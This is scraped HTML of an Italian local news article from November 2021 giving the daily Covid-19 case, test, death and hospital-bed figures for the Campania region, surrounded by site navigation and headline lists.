                                <img width="660" height="330" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59-660x330.png" class="attachment-bd-normal size-bd-normal wp-post-image lazyload" alt="" data-srcset="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59-660x330.png 660w, https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59-1052x526.png 1052w" sizes="(max-width: 660px) 100vw, 660px" /><noscript><img width="660" height="330" src="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59-660x330.png" class="attachment-bd-normal size-bd-normal wp-post-image lazyload" alt="" srcset="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59-660x330.png 660w, https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59-1052x526.png 1052w" sizes="(max-width: 660px) 100vw, 660px" /></noscript>                            </a>
                                            </figure>
                </div>
            </div><div class="cf"></div><!-- #post-featured -->
                            <p><strong>CAMPANIA &#8211; </strong>E&#8217; stato diffuso poco fa il consueto aggiornamento sull&#8217;emergenza covid in Campania. Questi i numeri di oggi:</p>
<div class="o9v6fnle cxmmr5t8 oygrvhab hcukyx3x c1et5uql ii04i59q">
<div dir="auto">Positivi del giorno: 493</div>
<div dir="auto">Test: 29.252</div>
</div>
<div class="o9v6fnle cxmmr5t8 oygrvhab hcukyx3x c1et5uql ii04i59q">
<div dir="auto">Deceduti: 5 (*)</div>
<div dir="auto">(*) nelle ultime 48 ore; 3 deceduti in precedenza ma registrati ieri.</div>
</div>
<div class="o9v6fnle cxmmr5t8 oygrvhab hcukyx3x c1et5uql ii04i59q">
<div dir="auto">Report posti letto su base regionale:</div>
</div>
<div class="o9v6fnle cxmmr5t8 oygrvhab hcukyx3x c1et5uql ii04i59q">
<div dir="auto">Posti letto di terapia intensiva disponibili: 656</div>
<div dir="auto">Posti letto di terapia intensiva occupati: 18</div>
<div dir="auto">Posti letto di degenza disponibili: 3.160 (**)</div>
<div dir="auto">Posti letto di degenza occupati: 281</div>
<div dir="auto">(**) Posti letto Covid e Offerta privata.</div>
</div>
<p><strong>I DATI DI OGGI IN GRAFICA:</strong></p>
<p><a class="pop-img-bd" href="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2.jpg"><img class="alignnone size-medium wp-image-301422 lazyload" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2-300x135.jpg" alt="" width="300" height="135" data-srcset="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2-300x135.jpg 300w, https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2-1024x461.jpg 1024w, https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2-768x346.jpg 768w, https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2.jpg 1287w" sizes="(max-width: 300px) 100vw, 300px" /><noscript><img class="alignnone size-medium wp-image-301422 lazyload" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2-300x135.jpg" alt="" width="300" height="135" srcset="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2-300x135.jpg 300w, https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2-1024x461.jpg 1024w, https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2-768x346.jpg 768w, https://www.ilmeridianonews.it/wp-content/uploads/2021/11/grafica-campania-2.jpg 1287w" sizes="(max-width: 300px) 100vw, 300px" /></noscript></a></p>
                
                
                <div id="articleBottom-ads" class="articleBottom-ads">
            
                <div class="g g-9"><div class="g-single a-7"><a href="http://www.union-security.net/"><img src="https://www.ilmeridianonews.it/wp-content/uploads/2018/03/RESTA2.jpg" /></a></div></div>
                    </div>            </div><!-- .post-content-bd -->
            <footer>
                                
                                    <div class="cf"></div>
                    <div class="post-nav-links">
                        <div class="post-nav-prev">
                            <a href="https://www.ilmeridianonews.it/2021/11/maltempo-voragine-in-strada-in-provincia-di-napoli/" rel="prev"><span>Previous article</span> Maltempo, voragine in strada in provincia di Napoli</a>                        </div>
                        <div class="post-nav-next">
                                                    </div>
                    </div>

                    <div class="cf"></div>
                    <!-- .post-nav-links -->
                
                
                        <div class="cf"></div>
        <div class="post-related-bd">
            <div class="title-bd">
                <h3>
                    Related Posts                </h3>
            </div><!-- .title-bd -->

            <section id="related-posts">
                <div class="related-inner">
                    
                        <div class="related-row">
                        <div data-val="301418" class="rp-post" >

                                                                                                                        <div class="rp-thumbnail"><a href="https://www.ilmeridianonews.it/2021/11/maltempo-voragine-in-strada-in-provincia-di-napoli/" rel="bookmark">
                                        <img width="331" height="219" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/voragine-331x219.jpg" class="attachment-bd-large size-bd-large wp-post-image lazyload" alt="" /><noscript><img width="331" height="219" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/voragine-331x219.jpg" class="attachment-bd-large size-bd-large wp-post-image lazyload" alt="" /></noscript>                                    </a></div><!-- .rp-thumbnail -->
                                                            
                            <div class="rp-meta">
                                <h3  class="entry-title"><a  href="https://www.ilmeridianonews.it/2021/11/maltempo-voragine-in-strada-in-provincia-di-napoli/" title="Maltempo, voragine in strada in provincia di Napoli" rel="bookmark">Maltempo, voragine in strada in provincia di Napoli</a></h3>
                                <span class="ws-info"><span>9 Novembre 2021</span></span>
                            </div><!-- .rp-meta -->

                        </div>

                                                                    
                        
                        <div data-val="301405" class="rp-post" >

                                                                                                                        <div class="rp-thumbnail"><a href="https://www.ilmeridianonews.it/2021/11/studentessa-di-16-anni-precipita-dal-terzo-piano-della-scuola-corsa-in-ospedale/" rel="bookmark">
                                        <img width="331" height="219" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/ambulanza2-331x219.jpg" class="attachment-bd-large size-bd-large wp-post-image lazyload" alt="" /><noscript><img width="331" height="219" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/ambulanza2-331x219.jpg" class="attachment-bd-large size-bd-large wp-post-image lazyload" alt="" /></noscript>                                    </a></div><!-- .rp-thumbnail -->
                                                            
                            <div class="rp-meta">
                                <h3  class="entry-title"><a  href="https://www.ilmeridianonews.it/2021/11/studentessa-di-16-anni-precipita-dal-terzo-piano-della-scuola-corsa-in-ospedale/" title="Studentessa di 16 anni precipita dal terzo piano della scuola: corsa in ospedale" rel="bookmark">Studentessa di 16 anni precipita dal terzo piano della scuola: corsa in ospedale</a></h3>
                                <span class="ws-info"><span>9 Novembre 2021</span></span>
                            </div><!-- .rp-meta -->

                        </div>

                                                                    
                        
                        <div data-val="301410" class="rp-post last-col" >

                                                                                                                        <div class="rp-thumbnail"><a href="https://www.ilmeridianonews.it/2021/11/aveva-accoltellato-un-poliziotto-a-cannes-perquisita-casa-dellaggressore-a-napoli/" rel="bookmark">
                                        <img width="331" height="219" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/poliziott-aggredito-cannes-indagini-napoli-331x219.jpg" class="attachment-bd-large size-bd-large wp-post-image lazyload" alt="" /><noscript><img width="331" height="219" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/poliziott-aggredito-cannes-indagini-napoli-331x219.jpg" class="attachment-bd-large size-bd-large wp-post-image lazyload" alt="" /></noscript>                                    </a></div><!-- .rp-thumbnail -->
                                                            
                            <div class="rp-meta">
                                <h3  class="entry-title"><a  href="https://www.ilmeridianonews.it/2021/11/aveva-accoltellato-un-poliziotto-a-cannes-perquisita-casa-dellaggressore-a-napoli/" title="Aveva accoltellato un poliziotto a Cannes: perquisita casa dell&#8217;aggressore a Napoli" rel="bookmark">Aveva accoltellato un poliziotto a Cannes: perquisita casa dell&#8217;aggressore a Napoli</a></h3>
                                <span class="ws-info"><span>9 Novembre 2021</span></span>
                            </div><!-- .rp-meta -->

                        </div>

                        </div>
                                                                                </div>
            </section>

        </div>
        <div class="cf"></div>
        <!-- .post-related-bd -->
                </footer>
            
            
	        	        <span style="display: none;" itemprop="author" itemscope="" itemtype="https://schema.org/Person">
				<meta itemprop="name" content="Gianluca Russo">
			</span>
	        <meta itemprop="interactionCount" content="UserComments:0">
	        <meta itemprop="datePublished" content="2021-11-09T16:51:42+00:00">
	        <meta itemprop="dateModified" content="2021-11-09T16:51:42+00:00">
	        <meta itemscope="" itemprop="mainEntityOfPage" itemtype="https://schema.org/WebPage" itemid="https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/">
			<span style="display: none;" itemprop="publisher" itemscope="" itemtype="https://schema.org/Organization">
				<span style="display: none;" itemprop="logo" itemscope="" itemtype="https://schema.org/ImageObject">
					<meta itemprop="url" content="https://www.ilmeridianonews.it/wp-content/uploads/2016/05/LOGOMERI1.png">
				</span>
				<meta itemprop="name" content="Il Meridiano News">
			</span>
	        <meta itemprop="headline " content="Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati">
			<span style="display: none;" itemprop="image" itemscope="" itemtype="https://schema.org/ImageObject">
				<meta itemprop="url" content="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59.png">
				<meta itemprop="width" content="1240">
				<meta itemprop="height" content="540">
			</span>
        </article>
                <div class="cf"></div>
</div><!-- #content -->
<div id="sidebar" class="theia_sticky">
    <div class="theiaStickySidebar">
    <section id="bd-recent-posts-3" class="single-widget widget widget-main bd-recent-posts"><div class="widget-title widget-sidebar-title"><h3 class="">Ultimissime</h3></div><div class="widget-posts-list">
                <div class="widget-story ws-post-first" role="article">

                                                <div class="ws-thumbnail">
                        <a href="https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/" rel="bookmark">
                                                            <img width="90" height="68" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59-90x68.png" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /><noscript><img width="90" height="68" src="https://www.ilmeridianonews.it/wp-content/uploads/2020/12/DE-LUCA_-OGGI-A-GIUGLIANO-116-POSITIVI-59-90x68.png" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /></noscript>                                                    </a>
                    </div><!-- thumbnail /-->
                            
            <div class="ws-meta">
                                    <h3 class="entry-title">
                        <a href="https://www.ilmeridianonews.it/2021/11/coronavirus-in-campania-493-nuovi-casi-altri-5-decessi-registrati/" rel="bookmark">Coronavirus in Campania: 493 nuovi casi, altri 5 decessi registrati</a>
                    </h3>
                    <span class="ws-info"><a class="widget-meta-author" href="https://www.ilmeridianonews.it/author/gianlucarusso/">Gianluca Russo </a><span>9 Novembre 2021</span></span>
                                                                </div><!-- .ws-meta -->
        </div><!-- .widget-story -->

        
                <div class="widget-story ws-post-sec" role="article">

                                                <div class="ws-thumbnail">
                        <a href="https://www.ilmeridianonews.it/2021/11/maltempo-voragine-in-strada-in-provincia-di-napoli/" rel="bookmark">
                                                            <img width="90" height="68" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/voragine-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /><noscript><img width="90" height="68" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/voragine-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /></noscript>                                                    </a>
                    </div><!-- thumbnail /-->
                            
            <div class="ws-meta">
                                    <h3 class="entry-title">
                        <a href="https://www.ilmeridianonews.it/2021/11/maltempo-voragine-in-strada-in-provincia-di-napoli/" rel="bookmark">Maltempo, voragine in strada in provincia di Napoli</a>
                    </h3>
                    <span class="ws-info"><a class="widget-meta-author" href="https://www.ilmeridianonews.it/author/giovanna/">Giovanna Iazzetta </a><span>9 Novembre 2021</span></span>
                                                                </div><!-- .ws-meta -->
        </div><!-- .widget-story -->

        
                <div class="widget-story ws-post-sec" role="article">

                                                <div class="ws-thumbnail">
                        <a href="https://www.ilmeridianonews.it/2021/11/studentessa-di-16-anni-precipita-dal-terzo-piano-della-scuola-corsa-in-ospedale/" rel="bookmark">
                                                            <img width="90" height="68" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/ambulanza2-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /><noscript><img width="90" height="68" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/ambulanza2-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /></noscript>                                                    </a>
                    </div><!-- thumbnail /-->
                            
            <div class="ws-meta">
                                    <h3 class="entry-title">
                        <a href="https://www.ilmeridianonews.it/2021/11/studentessa-di-16-anni-precipita-dal-terzo-piano-della-scuola-corsa-in-ospedale/" rel="bookmark">Studentessa di 16 anni precipita dal terzo piano della scuola: corsa in ospedale</a>
                    </h3>
                    <span class="ws-info"><a class="widget-meta-author" href="https://www.ilmeridianonews.it/author/giovanna/">Giovanna Iazzetta </a><span>9 Novembre 2021</span></span>
                                                                </div><!-- .ws-meta -->
        </div><!-- .widget-story -->

        
                <div class="widget-story ws-post-sec" role="article">

                                                <div class="ws-thumbnail">
                        <a href="https://www.ilmeridianonews.it/2021/11/aveva-accoltellato-un-poliziotto-a-cannes-perquisita-casa-dellaggressore-a-napoli/" rel="bookmark">
                                                            <img width="90" height="68" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/poliziott-aggredito-cannes-indagini-napoli-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /><noscript><img width="90" height="68" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/poliziott-aggredito-cannes-indagini-napoli-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /></noscript>                                                    </a>
                    </div><!-- thumbnail /-->
                            
            <div class="ws-meta">
                                    <h3 class="entry-title">
                        <a href="https://www.ilmeridianonews.it/2021/11/aveva-accoltellato-un-poliziotto-a-cannes-perquisita-casa-dellaggressore-a-napoli/" rel="bookmark">Aveva accoltellato un poliziotto a Cannes: perquisita casa dell&#8217;aggressore a Napoli</a>
                    </h3>
                    <span class="ws-info"><a class="widget-meta-author" href="https://www.ilmeridianonews.it/author/gianlucarusso/">Gianluca Russo </a><span>9 Novembre 2021</span></span>
                                                                </div><!-- .ws-meta -->
        </div><!-- .widget-story -->

        </div></section><section id="bd-cate-posts-4" class="single-widget widget widget-main bd-cate-posts"><div class="widget-title widget-sidebar-title"><h3 class="">SPORT</h3></div><div class="widget-posts-fp-big">
                <div class="widget-story ws-post-first" role="article">

                                                <div class="ws-thumbnail">
                        <a href="https://www.ilmeridianonews.it/2021/11/focus-napoli-verona-simeone-di-lorenzo-hellas/" rel="bookmark">
                                                                                                <img width="331" height="219" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/lapr0922_ori_crop_MASTER__0x0-331x219.jpg" class="attachment-bd-large size-bd-large wp-post-image lazyload" alt="Di Loremzo, autore del gol azzurro contro il Verona" /><noscript><img width="331" height="219" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/lapr0922_ori_crop_MASTER__0x0-331x219.jpg" class="attachment-bd-large size-bd-large wp-post-image lazyload" alt="Di Loremzo, autore del gol azzurro contro il Verona" /></noscript>                                    <div class="wsm-info">
                                                                                <h3 class="entry-title">
                                            <a href="https://www.ilmeridianonews.it/2021/11/focus-napoli-verona-simeone-di-lorenzo-hellas/" rel="bookmark">Focus Napoli &#8211; Verona. La storia si ripete: botta-risposta Simeone-Di Lorenzo e l&#8217;Hellas ferma nuovamente gli azzurri</a>
                                        </h3>
                                        <span class="ws-info"><a class="widget-meta-author" href="https://www.ilmeridianonews.it/author/salvati/">Antonio Salvati </a><span>7 Novembre 2021</span></span>
                                    </div>
                                                                                    </a>
                    </div><!-- thumbnail /-->
                            
            <div class="ws-meta">
                                
            </div><!-- .ws-meta -->
        </div><!-- .widget-story -->

        
                <div class="widget-story ws-post-sec" role="article">

                                                <div class="ws-thumbnail">
                        <a href="https://www.ilmeridianonews.it/2021/11/giugliano-batte-vis-artena-2-1-gialloblu-ancora-in-vetta-le-dichiarazioni-del-mister-ferraro/" rel="bookmark">
                                                                                                <img width="90" height="68" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/giugk-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /><noscript><img width="90" height="68" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/giugk-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /></noscript>                                                                                    </a>
                    </div><!-- thumbnail /-->
                            
            <div class="ws-meta">
                                    <h3 class="entry-title"><a href="https://www.ilmeridianonews.it/2021/11/giugliano-batte-vis-artena-2-1-gialloblu-ancora-in-vetta-le-dichiarazioni-del-mister-ferraro/" title="Giugliano batte Vis Artena 2-1, gialloblu ancora in vetta: le dichiarazioni del mister Ferraro" rel="bookmark">Giugliano batte Vis Artena 2-1, gialloblu ancora in vetta: le dichiarazioni del mister Ferraro</a></h3>
                    <span class="ws-info"><a class="widget-meta-author" href="https://www.ilmeridianonews.it/author/redazione/">redazione </a><span>7 Novembre 2021</span></span>
                                                    
            </div><!-- .ws-meta -->
        </div><!-- .widget-story -->

        
                <div class="widget-story ws-post-sec" role="article">

                                                <div class="ws-thumbnail">
                        <a href="https://www.ilmeridianonews.it/2021/11/giugliano-calcio-domani-la-sfida-contro-la-vis-artena-le-dichiarazioni-del-mister-ferraro/" rel="bookmark">
                                                                                                <img width="90" height="68" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/giugk-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /><noscript><img width="90" height="68" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/giugk-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /></noscript>                                                                                    </a>
                    </div><!-- thumbnail /-->
                            
            <div class="ws-meta">
                                    <h3 class="entry-title"><a href="https://www.ilmeridianonews.it/2021/11/giugliano-calcio-domani-la-sfida-contro-la-vis-artena-le-dichiarazioni-del-mister-ferraro/" title="Giugliano Calcio, domani la sfida contro la Vis Artena: le dichiarazioni del mister Ferraro" rel="bookmark">Giugliano Calcio, domani la sfida contro la Vis Artena: le dichiarazioni del mister Ferraro</a></h3>
                    <span class="ws-info"><a class="widget-meta-author" href="https://www.ilmeridianonews.it/author/redazione/">redazione </a><span>6 Novembre 2021</span></span>
                                                    
            </div><!-- .ws-meta -->
        </div><!-- .widget-story -->

        
                <div class="widget-story ws-post-sec" role="article">

                                                <div class="ws-thumbnail">
                        <a href="https://www.ilmeridianonews.it/2021/11/napoli-dedica-il-gol-al-papa-dellallenatore-avversario-scomparso-lautore-e-un-piccolo-grande-bomber/" rel="bookmark">
                                                                                                <img width="90" height="68" src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/Screenshot_20211105_181500-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /><noscript><img width="90" height="68" src="https://www.ilmeridianonews.it/wp-content/uploads/2021/11/Screenshot_20211105_181500-90x68.jpg" class="attachment-bd-small size-bd-small wp-post-image lazyload" alt="" /></noscript>                                                                                    </a>
                    </div><!-- thumbnail /-->
                            
            <div class="ws-meta">
                                    <h3 class="entry-title"><a href="https://www.ilmeridianonews.it/2021/11/napoli-dedica-il-gol-al-papa-dellallenatore-avversario-scomparso-lautore-e-un-piccolo-grande-bomber/" title="Napoli, dedica il gol al papà dell&#8217;allenatore avversario scomparso: l&#8217;autore è un piccolo, grande &#8216;bomber&#8217;" rel="bookmark">Napoli, dedica il gol al papà dell&#8217;allenatore avversario scomparso: l&#8217;autore è un piccolo, grande &#8216;bomber&#8217;</a></h3>
                    <span class="ws-info"><a class="widget-meta-author" href="https://www.ilmeridianonews.it/author/fbiondi/">Francesco Biondi </a><span>5 Novembre 2021</span></span>
                                                    
            </div><!-- .ws-meta -->
        </div><!-- .widget-story -->

        </div></section>    </div>
</div>
<!-- #sidebar -->                </div>
            </div><!-- .container-main -->
        </div><!-- .bdayh-wrap -->
    </div><!-- #main -->


    <div class="cf"></div><div class="bdayh-wrap">
        <div class="bdayh-inner">
                    </div>
    </div><div class="cf"></div>

            <div class="cf"></div>
        <footer id="footer" class="footer col-four">
            <div class="bdayh-wrap">
                <div class="container-main">
                    <div class="bdayh-inner">
                    
                        
                                                            <section id="bd-aboutme-widget-2" class="bd-aboutme-widget widget widget-area-first widget-footer">
                    <div class="about-me-img">
                <a href="https://www.ilmeridianonews.it/wp-content/uploads/2016/11/LOGOB4-3.png" class="about-img-modal" title="About">
                    <img src="https://www.ilmeridianonews.it/wp-content/uploads/2016/11/LOGOB4-3.png" alt="about" />
                </a>
            </div><br>
        
                    <div class="about-me-text">Registrazione al Registro Stampa del Tribunale di Napoli n. 27 del 07/06/2013
Num. R.G. 4223/2013 - Iscrizione al R.O.C. n. 23632 del 17/07/2013
<br>
<br>
Editore: Associazione EOS - Corso Campano n° 134 - 80014 - Giugliano in Campania
<br>
<br>
C.F. 95172600637
<br>
P.I. 08648721218</div>
        

        
        </section>                            
                                                            <section id="nav_menu-3" class="widget_nav_menu widget widget-area-first widget-footer"><div class="widget-title  widget-footer-title"><h3 class="">Aree del sito</h3></div><div class="menu-citta-container"><ul id="menu-citta-1" class="menu"><li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children menu-item-27647"><a href="https://www.ilmeridianonews.it/category/area-nord/">Area Nord</a>
<ul class="sub-menu">
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28122"><a href="https://www.ilmeridianonews.it/category/giugliano-2/">Giugliano</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-22528"><a href="https://www.ilmeridianonews.it/category/fascia-costiera-2/">Fascia Costiera</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28124"><a href="https://www.ilmeridianonews.it/category/villaricca-2/">Villaricca</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28121"><a href="https://www.ilmeridianonews.it/category/melito-2/">Melito</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28125"><a href="https://www.ilmeridianonews.it/category/mugnano-2/">Mugnano</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28123"><a href="https://www.ilmeridianonews.it/category/marano-2/">Marano</a></li>
	<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-28126"><a href="https://www.ilmeridianonews.it/category/qualiano-2/">Qualiano</a></li>
</ul>
</li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79058"><a href="https://www.ilmeridianonews.it/category/casoria/">Casoria</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79061"><a href="https://www.ilmeridianonews.it/category/afragola/">Afragola</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79062"><a href="https://www.ilmeridianonews.it/category/frattamaggiore/">Frattamaggiore</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-79204"><a href="https://www.ilmeridianonews.it/category/aversa/">Aversa</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17250"><a href="https://www.ilmeridianonews.it/category/agro-aversano/">Casertano</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17251"><a href="https://www.ilmeridianonews.it/category/area-flegrea-2/">Area Flegrea</a></li>
<li class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-17252"><a href="https://www.ilmeridianonews.it/category/altre-citta/">Altre città</a></li>
</ul></div></section>                            
                                                            <section id="bd-aboutme-widget-5" class="bd-aboutme-widget widget widget-area-first widget-footer"><div class="widget-title widget-footer-title"><h3 class="">Siti consigliati</h3></div>
        
                    <div class="about-me-text"><a href="http://www.letteratu.it">www.letteratu.it</a> <br> <a href="https://www.futuroprossimo.it">www.futuroprossimo.it</a> <br><a href="https://www.ecotu.it">www.ecotu.it</a> <br><a href="http://www.cinecircus.it">www.cinecircus.it</a></div>
        

        
        </section><section id="archives-6" class="widget_archive widget widget-area-first widget-footer"><div class="widget-title widget-footer-title"><h3 class="">Archivio</h3></div>		<label class="screen-reader-text" for="archives-dropdown-6">Archivio</label>
		<select id="archives-dropdown-6" name="archive-dropdown">
			
			<option value="">Seleziona il mese</option>
				<option value='https://www.ilmeridianonews.it/2021/11/'> Novembre 2021 &nbsp;(331)</option>
	<option value='https://www.ilmeridianonews.it/2021/10/'> Ottobre 2021 &nbsp;(1157)</option>
	<option value='https://www.ilmeridianonews.it/2021/09/'> Settembre 2021 &nbsp;(1062)</option>
	<option value='https://www.ilmeridianonews.it/2021/08/'> Agosto 2021 &nbsp;(982)</option>
	<option value='https://www.ilmeridianonews.it/2021/07/'> Luglio 2021 &nbsp;(1193)</option>
	<option value='https://www.ilmeridianonews.it/2021/06/'> Giugno 2021 &nbsp;(1267)</option>
	<option value='https://www.ilmeridianonews.it/2021/05/'> Maggio 2021 &nbsp;(1314)</option>
	<option value='https://www.ilmeridianonews.it/2021/04/'> Aprile 2021 &nbsp;(1321)</option>
	<option value='https://www.ilmeridianonews.it/2021/03/'> Marzo 2021 &nbsp;(1371)</option>
	<option value='https://www.ilmeridianonews.it/2021/02/'> Febbraio 2021 &nbsp;(1216)</option>
	<option value='https://www.ilmeridianonews.it/2021/01/'> Gennaio 2021 &nbsp;(1302)</option>
	<option value='https://www.ilmeridianonews.it/2020/12/'> Dicembre 2020 &nbsp;(1241)</option>
	<option value='https://www.ilmeridianonews.it/2020/11/'> Novembre 2020 &nbsp;(1285)</option>
	<option value='https://www.ilmeridianonews.it/2020/10/'> Ottobre 2020 &nbsp;(1336)</option>
	<option value='https://www.ilmeridianonews.it/2020/09/'> Settembre 2020 &nbsp;(1184)</option>
	<option value='https://www.ilmeridianonews.it/2020/08/'> Agosto 2020 &nbsp;(809)</option>
	<option value='https://www.ilmeridianonews.it/2020/07/'> Luglio 2020 &nbsp;(1098)</option>
	<option value='https://www.ilmeridianonews.it/2020/06/'> Giugno 2020 &nbsp;(1075)</option>
	<option value='https://www.ilmeridianonews.it/2020/05/'> Maggio 2020 &nbsp;(1026)</option>
	<option value='https://www.ilmeridianonews.it/2020/04/'> Aprile 2020 &nbsp;(1042)</option>
	<option value='https://www.ilmeridianonews.it/2020/03/'> Marzo 2020 &nbsp;(1175)</option>
	<option value='https://www.ilmeridianonews.it/2020/02/'> Febbraio 2020 &nbsp;(850)</option>
	<option value='https://www.ilmeridianonews.it/2020/01/'> Gennaio 2020 &nbsp;(774)</option>
	<option value='https://www.ilmeridianonews.it/2019/12/'> Dicembre 2019 &nbsp;(748)</option>
	<option value='https://www.ilmeridianonews.it/2019/11/'> Novembre 2019 &nbsp;(811)</option>
	<option value='https://www.ilmeridianonews.it/2019/10/'> Ottobre 2019 &nbsp;(913)</option>
	<option value='https://www.ilmeridianonews.it/2019/09/'> Settembre 2019 &nbsp;(750)</option>
	<option value='https://www.ilmeridianonews.it/2019/08/'> Agosto 2019 &nbsp;(619)</option>
	<option value='https://www.ilmeridianonews.it/2019/07/'> Luglio 2019 &nbsp;(829)</option>
	<option value='https://www.ilmeridianonews.it/2019/06/'> Giugno 2019 &nbsp;(829)</option>
	<option value='https://www.ilmeridianonews.it/2019/05/'> Maggio 2019 &nbsp;(925)</option>
	<option value='https://www.ilmeridianonews.it/2019/04/'> Aprile 2019 &nbsp;(717)</option>
	<option value='https://www.ilmeridianonews.it/2019/03/'> Marzo 2019 &nbsp;(785)</option>
	<option value='https://www.ilmeridianonews.it/2019/02/'> Febbraio 2019 &nbsp;(757)</option>
